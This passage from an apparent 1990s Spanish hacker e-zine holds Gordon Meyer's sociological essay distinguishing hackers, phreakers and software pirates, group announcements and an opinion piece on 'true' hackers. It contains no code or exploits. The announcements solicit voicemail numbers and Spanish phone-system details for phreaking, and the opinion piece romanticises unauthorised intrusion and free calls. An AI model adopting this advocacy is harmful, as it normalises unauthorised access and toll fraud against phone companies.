Nothing but the Truth by Steve Fleming 19K 17. International Scenes by Various Sources 33K 18. Phrack World News by Datastream Cowboy 21K Total: 633K -= Phrack 49 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction 07K 2. Phrack loopback 06K 3. Line Noise 65K 4. Phrack Prophile on Mudge by Phrack Staff 08K 5. Introduction to Telephony and PBX systems by Cavalier 100K 6. Project Loki: ICMP Tunneling by daemon9/alhambra 10K 7. Project Hades: TCP weaknesses by daemon9 * 38K 8. Introduction to CGI and CGI vulnerabilities by G. Gilliss * 12K 9. Content-Blind Cancelbot by Dr. Dimitri Vulis 40K 10. A Steganography Improvement Proposal by cjm1 06K 11. South Western Bell Lineman Work Codes by Icon 18K 12. Introduction to the FedLine software system by Parmaster 19K 13. Telephone Company Customer Applications by Voyager 38K 14. Smashing The Stack For Fun And Profit by Aleph1 66K 15. TCP port Stealth Scanning by Uriel * 32K 16. Phrack World News by Disorder 109K Total: 575K el Duke de Sicilia 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 08. HACKERS, PHREACKERS Y PIRATAS 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Texto presentado en la conferencia de la Midwest American Culture / Popular Culture Association realizada el 5 de noviembre de 1977 en la Universidad de Bowling Green State. ------------------------------------------------------------------------------ Hackers, phreakers y piratas por Gordon Meyer ------------------------------------------------------------------------------ El avance de la era informatica ha introducido nuevos terminos en el vocabulario de cada dia. Una de estas palabras, hacker, tiene que ver con los delitos informaticos. Todos estamos familiarizados con las historias de chavales que consiguen entrar en las corporaciones informatizadas. Pero tengo la impresion de que el termino "hacker" es uno de los peor entendidos, aplicados y, por tanto, usados en la era informatica. Considerando la cantidad de terminos tecnicos que la informatica nos ha traido, esto parece ser una exageracion, pero permitanme explicarme. La cultura popular define a los hackers como aquellos que, con ayuda de sus conocimientos informaticos consiguen acceder a los ordenadores de los bancos y de los negociados del gobierno. Bucean por informacion que no les pertenece, roban software caro y realizan transacciones de una cuenta bancaria a otra. Los criminologos, por otra parte, describen a los hackers en terminos menos halageos. Donn Parker los denomina "violadores electronicos" y August Bequai los describe como "vandalos electronicos". Ambos, aunque aseveran que las actividades de los hackers son ilegales, eluden habilmente llamarlos "criminales informaticos". Hacen una clara distincion entre el hacker que realiza sus actividades por diversion y el empleado que de repente decide hacer algo malo. Por tanto, parece que tenemos una definicion en la que caben dos extremos: por un lado, el moderno ladron de bancos y por otro el chaval inquieto. Ambas actividades (y todas las intermedias) son calificadas con el mismo termino. Dificilmente se podria considerar esto como un ejemplo de conceptualizacion precisa. Una gran parte de esta ambigedad puede seguirse desde el origen durante estos aproximadamente 20 aos de vida del mencionado termino. El termino comenzo a usarse aplicandolo a un grupo de pioneros de la informatica del MIT, a principios de la decada de 1960. Desde entonces, y casi hasta finales de la decada de 1970, un hacker era una persona obsesionada por conocer lo mas posible sobre los sistemas informaticos. Los diseadores del ordenador Apple, Jobs y Wozniack, pueden considerarse hackers en este sentido de la palabra. Pero a principios de la decada de 1980, influenciados por la difusion de la pelicula Juegos de Guerra, y el ampliamente publicado arresto de una "banda de hackers" conocida como la 414, los hackers pasaron a ser considerados como chicos jovenes capaces de violar sistemas informaticos de grandes empresas y del gobierno. Desgraciadamente, los medios de informacion y la comunidad cientifica social no ha puesto mucho esfuerzo por variar esta definicion. El problema para llegar a una definicion mas precisa radica, tanto en la poca informacion que hay sobre sus actividades diaria, como en el hecho de que lo que se conoce de ellos no siempre cabe bajo las etiquetas de los delitos conocidos. Es decir, no hay una definicion legal que sea aplicable a los hackers, ni todas sus actividades conllevan la violacion de las leyes. Esto lleva a que la aplicacion del termino varie segun los casos, dependiendo de los cargos que se puedan imputar y no a raiz de un claro entendimiento de lo que el termino significa. Este problema, y la falta de entendimiento de lo que significa ser un hacker, convierte a esta en una etiqueta excesivamente utilizada para aplicar a muchos tipos de intrusiones informaticas. Parker y Bequai, dos lideres en el estudio de los delitos informaticos, utilizan el termino "hacker" de formas ligeramente diferentes. Parker reconoce que hacking no abarca todo el rango de actividades asociadas a la violacion de los sistemas informaticos, pero lo prefiere al termino "phreaking", que considera muy oscuro. Por otra parte, Bequai no rechaza el termino "phreaking" y a menudo lo aplica a hechos que Parker califica como de hacker. Bequai confunde aun mas el termino al definir al hacker como alguien que utiliza ilegalmente las tarjetas de credito telefonico para acceder a sistemas que distribuyen software comercial ilegalmente. Volveremos a la definicion mas tarde, y veremos que tiene poco que ver con las actuaciones propias de los hackers, pero es ilustrativa de otros tipos de actividades informaticas inusuales. Este trabajo se ha obtenido en base a una investigacion etnografica del submundo informatico oculto. La mayor parte de la informacion se ha obtenido a traves de entrevistas, llevadas a cabo en vivo por mi propia persona, con otros participantes en algunas actividades que mas tarde describire. Los terminos que utilizare, "hacker", "phreaker" y "pirata" se presentan y definen tal y como los entienden aquellos que se identifican con estos papeles. Mi referencia para este trabajo ha sido el submundo informatico oculto, no las leyes que se han hecho para controlarlo. Las tipificaciones e intenciones que se formulan al final deben entenderse, de alguna forma, como tentativas. Este articulo refleja el progreso del trabajo en mi tesis doctoral, y espero reordenar todos estos terminos en un entorno sociologico. Estas definiciones basicas son un primer paso necesario para delimitar, en el sentido sociologico, el submundo informatico oculto. En primer lugar, el area de los hackers. En la tradicion de esta comunidad informatica, el hacker puede realizar dos tipos de actividades: bien acceder a un sistema informatico, o bien algo mas general, como explorar y aprender a utilizar un sistema informatico. En la primera connotacion, el termino lleva asociados las herramientas y trucos para obtener cuentas de usuarios validos de un sistema informatico, que de otra forma serian inaccesibles para los hackers. Se podria pensar que esta palabra esta intimamente relacionada con la naturaleza repetitiva de los intentos de acceso. Ademas, una vez que se ha conseguido acceder, las cuentas ilicitas con a veces compartidas con otros asociados, denominandolas "frescas". He aqui la vision estereotipada de los medios de comunicacion de los hackers un joven de menos de veinte aos, con conocimientos de informatica, pegado al teclado de su ordenador, siempre en busca de una cuenta no usada o un punto debil en el sistema de seguridad. Aunque esta vision no es muy precisa, representa bastante bien el aspecto del termino. La segunda dimension del mencionado termino se ocupa de lo que sucede una vez que se ha conseguido acceder al sistema cuando se ha conseguido una clave de acceso. Como el sistema esta siendo utilizado sin autorizacion, el hacker no suele tener, el terminos generales, acceso a los manuales de operacion y otros recursos disponibles para los usuarios legitimos del sistema. Por tanto, el usuario experimenta con estructuras de comandos y explora ficheros para conocer el uso que se da al sistema. En oposicion con el primer aspecto del termino, aqui no se trata solo de acceder al sistema (aunque alguno podria estar buscando niveles de acceso mas restringidos), sino de aprender mas sobre la operacion general del sistema. Contrariamente a lo que piensan los medios de comunicacion, la mayoria de los hackers no destruyen no daan deliberadamente los datos. El hacerlo iria en contra de su intencion de mezclarse con el usuario normal y atraeria la atencion sobre su presencia, haciendo que la cuenta usada sea borrada. Despues de gastar un tiempo sustancias en conseguir la cuenta, el hacker pone una alta prioridad para que su uso no sea descubierto. Ademas de la obvia relacion entre las dos acepciones, la palabra "hacker" se reserva generalmente a aquellos que se dedican al segundo tipo. En otras palabras, un hacker es una persona que tiene el conocimiento, habilidad y deseo de explorar completamente un sistema informatico. El mero hecho de conseguir el acceso (adivinando la clave de acceso) no es suficiente para conseguir la denominacion. Debe haber un deseo de liderar, explotar y usar el sistema despues de haber accedido a el. Esta distincion parece logica, ya que no todos los intrusos mantienen el interes una vez que han logrado acceder al sistema. En el submundo informatico, las claves de acceso y las cuentas suelen intercambiarse y ponerse a disposicion del uso general. Por tanto, el hecho de conseguir el acceso puede considerarse como la parte "facil", por lo que aquellos que utilizan y exploran los sistemas son los que tienen un mayor prestigio. La segunda actividad es la de los phreakers telefonicos. Se convirtio en una actividad de uso comun cuando se publicaron las aventuras de John Draper, en un articulo de la revista Esquire, en 1971. Se trata de una forma de evitar los mecanismos de facturacion de las compaias telefonicas. Permite llamar a cualquiera de cualquier parte del mundo sin coste practicamente. En muchos casos, tambien evita, o al menos inhibe, la posibilidad de que se pueda trazar el camino de la llamada hasta su origen, evitando asi la posibilidad de ser cogido. Par la mayor parte de los miembros del submundo informatico, esta es simplemente una herramienta para poder realizar llamadas de larga distancia sin tener que pagar enormes facturas. La cantidad de personas que se consideran phreakers, contrariamente a lo que sucede con los hackers, es relativamente pequea. Pero aquellos que si se consideran phreakers lo hacen para explorar el sistema telefonico. La mayoria de la gente, aunque usa el telefono, sabe muy poco acerca de el. Los phreakers, por otra parte, quieren aprender mucho sobre el. Este deseo de conocimiento lo resume asi un phreaker activo: "El sistema telefonico es la cosa mas interesante y fascinante que conozco. Hay tantas cosas que aprender. Incluso los phreakers tienen diferentes areas de conocimiento. Hay tantas cosas que se pueden conocer que en una tentativa puede aprenderse algo muy importante y en la siguiente no. O puede suceder lo contrario. Todo depende de como y donde obtener la informacion. Yo mismo quisiera trabajar para una empresa de telecomunicaciones, haciendo algo interesante, como programar una central de conmutacion. Algo que no sea una tarea esclavizadora e insignificante. Algo que sea divertido. Pero hay que correr el riesgo para participar, a no ser que tengas la fortuna de trabajar para una de estas compaias. El tener acceso a las cosas de estas empresas, como manuales, etc., debe ser grandioso". La mayoria de la gente del submundo no se acerca al sistema telefonico con esa pasion. Solo estan interesados en explorar sus debilidades para otros fines. En este caso, el sistema telefonico es un fin en si mismo. Otro entrevistado que se identificaba a si mismo como hacker, explicaba: "Se muy poco sobre telefons simplemente soy un hacker. Mira, no puedo llamar a esos numeros directamente. Mucha gente hace lo mismo. En mi caso, hacer de phreaker es una herramienta, muy utilizada, pero una herramienta al fin y al cabo". En el submundo informatico, al posibilidad de actuar asi se agradece. Con la division del sistema Bell, llego el uso de la tarjeta de credito telefonica. Estas tarjetas abrieron la puerta para realizar este tipo de actividades a gran escala. Hoy en dia no hace falta ningun equipo especial. Solo un telefono con marcacion por tonos y un numero de una de esas tarjetas de credito, y con eso se puede llamar a cualquier parte del mundo. De igual forma que los participantes con mas conocimientos y motivacion son llamados hackers, aquellos que desean conocer el sistema telefonico son denominados phreakers. El uso de las herramientas que les son propias no esta limitada a los phreakers, pero no es suficiente para merecer la distincion. Finalmente llegamos a la "telepirateria" del software. Consiste en la distribucion ilegal de software protegido por los derechos de autor. No me refiero a la copia e intercambio de diskettes que se produce entre conocidos (que es igualmente ilegal), sino a la actividad que se realiza alrededor de los sistemas BBS que se especializan en este tipo de trafico. El acceso a este tipo de servicios se consigue contribuyendo, a traves de un modem telefonico, con una copia de un programa comercial. Este acto delictivo permite a los usuarios copiar, o "cargar", de tres a seis programas que otros hayan aportado. Asi, por el precio de una sola llamada telefonica, uno puede amontonar una gran cantidad de paquetes de software. En muchas ocasiones, incluso se evita pagar la llamada telefonica. Notese que al contrario que las dos actividades de hacker y phreaker, no hay ninguna consideracion al margen de "prestigio" o "motivacion" en la telepirateria. En este caso, el cometer los actos basta para "merecer" el titulo. La telepirateria esta hecha para las masas. Al contrario de lo que sucede con los hackers y los phreakers, no requiere ninguna habilidad especial. Cualquiera que tenga un ordenador con modem y algun software dispone de los elementos necesarios para entrar en el mundo de la telepirateria. Debido a que la telepirateria no requiere conocimientos especiales, el papel de los piratas no inspira ningun tipo de admiracion o prestigio en el submundo informatico. (Una posible excepcion la constituyen aquellos que son capaces de quitar la proteccion del software comercial.) Aunque los hackers y los phreakers de la informatica probablemente no desaprueben la pirateria, y sin duda participen individualmente de alguna forma, son menos activos (o menos visibles) en los BBS que se dedican a la telepirateria. Tienden a evitarlos porque la mayoria de los telepiratas carecen de conocimientos informaticos especiales, y por tanto son conocidos por abusar en exceso de la red telefonica para conseguir el ultimo programa de juegos. Un hacker mantiene la teoria de que son estos piratas los culpables de la mayoria de los fraudes con tarjetas de credito telefonicas. "Los medios de comunicacion afirman que son unicamente los hackers los responsables de las perdidas de las grandes compaias de telecomunicaciones y de los servicios de larga distancia. Este no es el caso. Nosotros (los hackers) representamos solo una pequea parte de estas perdidas. El resto esta causado por los piratas y ladrones que venden estos codigos en la calle." Otro hacker explica que el proceso de intercambiar grandes programas comerciales por modem normalmente lleva varias horas, y son estas llamadas, y no las que realizan los "entusiastas de telecomunicaciones", las que preocupan a las compaias telefonicas. Pero sin considerar la ausencia de conocimientos especiales, por la fama de abusar de la red, o por alguna otra razon, parece haber algun tipo de division entre los hackers / phreakers y los telepiratas. Despues de haber descrito los tres papeles del submundo informatico, podemos ver que la definicion presentada al principio, segun la cual un hacker era alguien que usaba una tarjeta de credito telefonico robada para cargar alguno de los ultimos juegos, no refleja las definiciones dadas en el propio submundo informatico. Obviamente, corresponde a la descripcion de un telepirata y no a las acciones propias de un hacker o un phreaker. En todo esto hay una serie de avisos. No quiero dar la impresion de que un individuo es un hacker, un phreaker o un telepirata exclusivamente. Estas categorias no son mutuamente excluyentes. De hecho, muchos individuos son capaces de actuar en mas de uno de estos papeles. Dada esta multiplicidad de papeles, como podemos los sociologos, periodistas e investigadores encontrar definiciones precisas para aplicar a las actividades encontradas en casos especificos? Creo que la respuesta se encuentra en buscar los objetivos que se han expuesto previamente. Recuerdese que el objetivo de un hacker no es entrar en un sistema, sino aprender como funciona. El objetivo de un phreaker no es realizar llamadas de larga distancia gratis, sino descubrir lo que la compaia telefonica no explica sobre su red y el objetivo de un telepirata es obtener una copia del software mas moderno para su ordenador. Asi, aunque un individuo tenga un conocimiento especial sobre los sistemas telefonicos, cuando realiza una llamada de larga distancia gratis para cargar un juego, esta actuando como un telepirata. En cierto modo, esto es un puro argumento semantico. Independientemente de que a un hacker se le etiquete erroneamente como telepirata, los accesos ilegales y las copias no autorizadas de software comercial van a seguir produciendose. Pero si queremos conocer los nuevos desarrollos de la era informatica, debemos identificar y reconocer los tres tipos de actividades con que nos podemos encontrar. El agrupar los tres tipos bajo una sola etiqueta es mas que impreciso, ignora las relaciones funcionales y diferencias entre ellos. Hay que admitir, de todas formas, que siempre habra alguien que este en desacuerdo con las diferencias que se han descrito entre los grupos. En el desarrollo de esta investigacion, quedo de manifiesto que no los individuos que realizan actualmente estas actividades se ponen de acuerdo en cuanto a donde estan las fronteras. Las categorias y papeles, como se ha indicado previamente, no son mutuamente exclusivos. En particular, el mundo de los hackers y los phreakers estan muy relacionados. Pero, de la misma forma que no debemos agrupar toda la actividad del submundo informatico bajo la acepcion de hacker, tampoco debemos insistir en que nuestras definiciones sean exclusivas hasta el punto de ignorar lo que representan. Las tipologias que he presentado son amplias y necesitan ser depuradas. Pero representan un paso mas en la representacion precisa, especificacion e identificacion de las actividades que se dan en el submundo de la informatica. *Articulo estraido de la revista electronica Cyber-Campus: "http://arraquis.dif.um.es/~cyber" --> Revista Cyber-Campus os recomiendo que le echeis un vistazo. 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 09. ANUNCIOS, PETICIONES, ETC... 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 1. Ahora que la revista empieza a rodar por ahi, algunos mencionan mi nombre (Incluso aparezco en algunos buscadores, guau) y muchos se confunden. No soy muy quisquilloso con eso, pero me apodo eljaker, todojunto y con k. No es que sea algo muy importante, pero mola ver tu nombre bien escrito por ahi. recordad (-: ELJAKER :-) 2. Sigo necesitando colaboradores, en aspectos como los virus, el phreacking, etc... A ver si alguien se anima. 3. No os corteis, estamos avidos de articulos, cualquiera que nos mandeis seguro que lo publicamos. 4. Acaban de salir los dos primeros Expedientes secretos de los saqueadores. Estos expedientes contienen metodos de hacking, explicitos y comprobados, explicando con detalle tecnicas concretas de hacking. Explican con todo detalle tecnicas reales y que funcionan en los sistemas actuales, comprobados por los miembros de nuestro equipo. Devido a su contenido, que podria ser peligroso si callese en malas manos, hemos decidido no distribuirlos publicamente y solo se lo daremos a nuestros mas cercanos colaboradores y a los que nos proporcionen informaciones valiosas y buenos articulos. Los dos primeros expedientes son estos: X1 - Claves de doble uso X2 - Analisis completo y hacking del ftp-daemon (En preparacion) 5. Teniamos una exclusiva que era una bomba, pero por problemas tecnicos no hemos podido acabarla para este numero. Para terminarlo necesitamos vuestra colaboracion, y os pedimos que nos envies numeros de telefono de buzones de voz, fonobuzones o contestadores multiples que conozcais. 6. El numero pasado, anunciabamos la salida de una nueva publicacion en castellano que trataba estos mismos temas, la TYHS. Tambien deciamos que esto se movia, pues es verdad, acaban de salir dos mas, tambien muy completas y prometedoras. Son la WEB-HACK y la CYBER-HACK. Tal vez en proximos numeros hagamos una comparativa de ellas. 7. Debido al fastidioso lapso de los examenes de febrero, el grupo se disolvera temporalmente. Para asuntos muy urgentes podeis acudir a warezzman. Sera solo un mes, no os preocupeis. Podeis seguir dejando mensajes, pero tardaremos algo en contestarlos. 8. Necesitamos informacion sobre el sistema telefonico espaol, en aspectos como el caller-id, codigos de prefijo (Ej. *XX), traceo de llamadas, centralitas digitales y analogicas, desvio de llamadas, bloqueo de llamadas, llamadas anonimas, etc... Ya se que es dificil y que la telefonica es muy dura, pero macho, algo hay que hacer para remediarlo. 9. Leyendo las otras revistas en castellano sobre hacking, hemos visto que nos llaman "la competencia", yo no lo veo asi, en realidad teniamos que colaborar y ayudarnos. Yo estoy dispuesto a ayudar y a recibir ayuda y me ofrezco para escribir un articulo en alguna de ellas, si sus editores quieren. 10. Se estan pensando nuevas secciones de la revista, como humor, noticias, cotilleos, entrevistas, etc... decirnos que opinias de ellas y si quereis que las incluyamos en proximos numeros. 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 10. SER O NO SER HACKER? 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Ser o no ser hacker? Por Francisco Jose Hurtado Un amigo me pregunto que me interesaba y cuando dije que los ordenadores, me pregunto que sistemas operativos manejaba. Tras nombrar los pocos que conocia, me pregunto: eres un hacker? Bueno, esa pregunta ha estado dandome vueltas en la cabeza hasta ahora. Que es exactamente un hacker?, un hacker real? Para aquellos que no saben de que va el tema, las noticias en los medios de comunicacion (y a veces los comics) han sacado las cosas de traste Un hacker, sin tener mucha idea, puede ser desde un usuario de ordenador, hasta alguien que destruye todo lo que encuentra a su paso en un terminal de ordenador. Algunos idiotas, se dedicaban, hace unos aos, a comprar un ordenador por Navidades, con un modem, y sacar informacion interesante, como juegos, datos, etc. de todo tipo de empresas y borrarlos o venderlos (ahora esos suelen estar en esas mismas empresas porque esa es la unica manera de mantenerlos callados sobre lo que encontraron en los ficheros). Ahora bien, de quien es la culpa? Pues de los hackers. Y esto tal vez sea porque a los medios de comunicacion de les suena bien la palabra, aunque me temo que solo una infima minoria sepa el significado correcto de la palabra. No busqueis en el diccionario, porque no tiene nada que ver con acuchillar o cortar. Los verdaderos hackers son inteligentes, tienen que serlo Puede ser que vayan muy bien en la Facultad, porque no tienen nada mas que hacer; o bien, que no les vaya nada bien, porque les parezca aburrida. Los que se aburren, es porque no les interesa aprender lo que en la Facultad les puedan ensear. Un verdadero hacker quiere aprender cosas nuevas, y como les ensean siempre lo mismo, una y otra vez, una y otra vez, pues terminan aburriendose. Los verdaderos hackers son curiosos y pacientes. Si no fuesen pacientes, terminarian por hartarse de querer entrar en el mismo sistema una y otra vez, asi que lo dejarian por perdido. Un verdadero hacker NO se mete en el sistema para borrarlo todo o para vender lo que consiga a otros. Los verdaderos hackers, quieren aprender, o quieren satisfacer su curiosidad, esa es la unica finalidad de introducirse en el sistema. Lo que quieren es buscar dentro de un lugar en el que nunca han estado, explorar todos los pequeos rincones de un mundo diferente del que ya conocen y que les aburre. Porque destruir algo y perderse el placer de decir a los demas que hemos estado en un lugar donde ellos no han estado? Porque destruir todo el mundo de la mayoria de hackers que solo cogen informacion por puro placer y exploran por lo mismo? Los hackers son inconformistas, porque pagar por unas llamadas de telefono que cuestas pesetas, miles de pesetas? Porque pagar por una informacion que solo vamos a nombrar una vez en nuestra vida, por ejemplo, un fichero de historia? Los hackers son discretos, quiero decir que cuando entran en un sistema es para su propia satisfaccion, no van por ahi cantandolo a los cuatro vientos. La mayoria de los casos de "hackers" que conocemos por la prensa son en realidad "fantasming", con lo que quiero decir, que si tu le dices a un amigo que has entrado en cierto sistema, de boca en boca ira pasando hasta que termine por saberse que tu habias entrado en un sistema cinco veces mayor (por el ruido de los canales de comunicacion), que habias destruido miles de ficheros y que habias inutilizado en sistema. Por eso es mejor mantener la boca cerrada. Llamar gratis y entrar en un sistema que no has visto antes son dos de las experiencias mas excitantes conocidas por el hombre, pero es una actividad que no seria posible de no ser por el phreaking (deporte consistente en hacer llamadas de telefono utilizando herramientas de hardware y software para engaar a la compaia telefonica y que no nos cobre las llamadas). Honestamente, no se si a alguien le gustara este texto, o si le servira para aclarar un poco sus ideas (a lo mejor se las enredo un poco mas), pero espero que alguien entienda lo que es realmente un hacker. Y a todos esos a quienes les gusta calificarse de "hackers": "a ver si crecemos un poquito?". Si quereis un fichero que pueda cambiar vuestro modo de ver el mundo de los hackers, los crackers y los phreakers: "The Hacker's Manifesto". Buscadlo en La Red, por alguno de los archiconocidos buscadores, ya sea el www.lycos.com, el www.webcrawler.com, www.yahoo.com, o cualquier otro. "Raw Data for Raw Nerves" *Articulo estraido de la revista electronica Cyber-Campus: "http://arraquis.dif.um.es/~cyber" --> Revista Cyber-Campus os recomiendo que le echeis un vistazo. 浜様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 11. DESPEDIDA 藩様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 Solo nos quedan fuerzas para decir, adios.... el grupo